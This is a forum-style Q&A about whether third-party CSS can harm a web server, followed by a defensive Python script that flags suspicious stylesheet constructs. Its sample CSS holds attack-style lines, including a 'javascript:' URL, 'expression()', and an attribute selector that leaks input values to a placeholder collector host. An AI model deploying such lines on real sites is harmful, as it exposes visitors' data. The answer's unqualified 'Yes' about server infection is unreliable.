
I found some MIT-licensed CSS I would like to use for my web app. I've been reading that malicious CSS can be injected into websites (source: Can Malicious Code Be Executed From A CSS File?) to launch a cross-site-scripting type of attack.

Here's my question: I'm wondering if it is possible for malicious CSS to infect my web server with malware, and if so, what would be the tell-tale signs of malice in that kind of CSS that I should look out for?

ElsaInSpirit

1 Answer


Short answer: Yes.

Long answer: You should always read and own the code you are copy-pasting. It's also a good clean-code practice to fix "smelly" code. You should check for any links and suspicious CSS. Do not just publish code before testing it yourself, i.e. visiting the pages yourself like a user/visitor of the website. This way you can be sure to avoid any malicious CSS code.

pegasuspect
  • From reading your answer it sounds like the malicious code could compromise my web page. But could it compromise the web server itself? And how? – ElsaInSpirit Jul 19 '19 at 15:14
  • I never tried to compromise a web server by writing CSS before :) so I can't give you an example even if there is one. The only thing is CSS is not very complicated, and if you have to copy-paste very long code like CSS libraries, do it from sources you trust. There are a couple of examples at the link you shared. They are nice, and quite obvious to the eye. – pegasuspect Jul 19 '19 at 15:19
  • It would be a problem for the visitor, not the server, because the image is downloaded into the client browser, not onto the server. – pegasuspect Jul 19 '19 at 15:25
  • Although the limitations and permissions of the file downloaded by the browser probably wouldn't let the Python file execute. – pegasuspect Jul 19 '19 at 15:27
  • The most extreme way I can fantasize would be to find a way to embed a malicious script in an image and to trigger the browser to run that script by showing the image. That, of course, requires knowledge of huge security leaks in the browser and know-how of the whole process, which I can only fantasize about :) – pegasuspect Jul 19 '19 at 15:31
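The answer above says to "check for any links and suspicious CSS" before publishing a third-party stylesheet. The following is an added example of what that review can look like as a repeatable check; it is not code from the question, the answer, or any CSS library. It is a small static triage script (the `audit_css` function and the `SAMPLE_CSS` stylesheet are both constructed here for illustration) that flags the constructs a reviewer would want to read by hand: `url()` and `@import` references that fetch from another origin, `javascript:` and non-image `data:` URLs, the legacy script hooks `expression()`, `behavior:` and `-moz-binding`, and rules that combine an attribute-substring selector with a remote `url()`. Everything it flags runs in the visitor's browser, not on the web server, which matches the point made in the comments.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample stylesheet (not from any real project): a few ordinary
# rules followed by the kinds of lines a reviewer should look at twice.
SAMPLE_CSS = """
/* ordinary rules */
body { font-family: sans-serif; background: url(images/bg.png); }
@import "reset.css";

/* things worth a second look */
@import url(https://cdn.example.net/extra.css);
.logo { background: url("http://tracker.example.net/pixel.gif"); }
.old { width: expression(document.body.clientWidth); }
.ie  { behavior: url(menu.htc); }
.ff  { -moz-binding: url(bind.xml#x); }
.js  { background: url(javascript:alert(1)); }
input[value^="a"] { background: url(https://collector.example.net/?v=a); }
"""


@dataclass
class Finding:
    line: int      # 1-based line number in the stylesheet
    kind: str      # category of the suspicious construct
    snippet: str   # the matched text, for the human reviewer


# url( ... ) with optional single or double quotes around the target
URL_RE = re.compile(r'url\(\s*([\'"]?)(.*?)\1\s*\)', re.IGNORECASE)
# @import "x.css"  or  @import url(x.css)
IMPORT_RE = re.compile(r'@import\s+(?:url\(\s*)?[\'"]?([^\'")\s;]+)', re.IGNORECASE)
# legacy constructs that let a stylesheet run script or load a binding
LEGACY_RE = re.compile(r'expression\s*\(|behavior\s*:|-moz-binding\s*:', re.IGNORECASE)
# attribute selectors that match on a substring of an attribute value
ATTR_SUBSTR_RE = re.compile(r'\[[^\]]*[\^$*]=')

REMOTE_PREFIXES = ("http:", "https:", "//")


def _strip_comments(css: str) -> str:
    """Remove /* ... */ comments but keep newlines so line numbers stay valid."""
    return re.sub(r'/\*.*?\*/', lambda m: "\n" * m.group(0).count("\n"), css, flags=re.S)


def audit_css(css: str) -> List[Finding]:
    """Return the suspicious constructs found in a stylesheet, one Finding each.

    This is a line-oriented triage aid, not a parser: rules that are split
    across lines or obfuscated with CSS escapes can slip past it, so treat an
    empty result as "nothing obvious", not as a guarantee.
    """
    findings: List[Finding] = []
    for lineno, line in enumerate(_strip_comments(css).splitlines(), start=1):
        is_import = line.lstrip().lower().startswith("@import")

        for m in IMPORT_RE.finditer(line):
            if m.group(1).lower().startswith(REMOTE_PREFIXES):
                findings.append(Finding(lineno, "external-import", m.group(0)))

        if not is_import:  # avoid reporting an @import's url() twice
            for m in URL_RE.finditer(line):
                target = m.group(2).strip().lower()
                if target.startswith(REMOTE_PREFIXES):
                    findings.append(Finding(lineno, "external-url", m.group(0)))
                elif target.startswith("javascript:"):
                    findings.append(Finding(lineno, "script-url", m.group(0)))
                elif target.startswith("data:") and not target.startswith("data:image/"):
                    findings.append(Finding(lineno, "non-image-data-url", m.group(0)))

        if LEGACY_RE.search(line):
            findings.append(Finding(lineno, "legacy-script-hook", line.strip()))

        # a selector keyed on part of an attribute value, paired with a fetch,
        # is the shape a reviewer should read most carefully
        if ATTR_SUBSTR_RE.search(line) and URL_RE.search(line):
            findings.append(Finding(lineno, "attr-selector-with-url", line.strip()))
    return findings


def is_clean(css: str) -> bool:
    """True when the triage finds nothing to review."""
    return not audit_css(css)


if __name__ == "__main__":
    for f in audit_css(SAMPLE_CSS):
        print(f"line {f.line:3d}  {f.kind:24s}  {f.snippet}")
```

Run it against the stylesheet you intend to ship and read every flagged line; a remote `url()` or `@import` is only a problem if you do not recognise the host, but it must be a host you chose. Since all of these constructs are evaluated by the visitor's browser, the complementary server-side control is a Content-Security-Policy with `img-src`, `font-src` and `style-src` limited to the origins you expect, so that a stray fetch the script missed is blocked by the browser anyway.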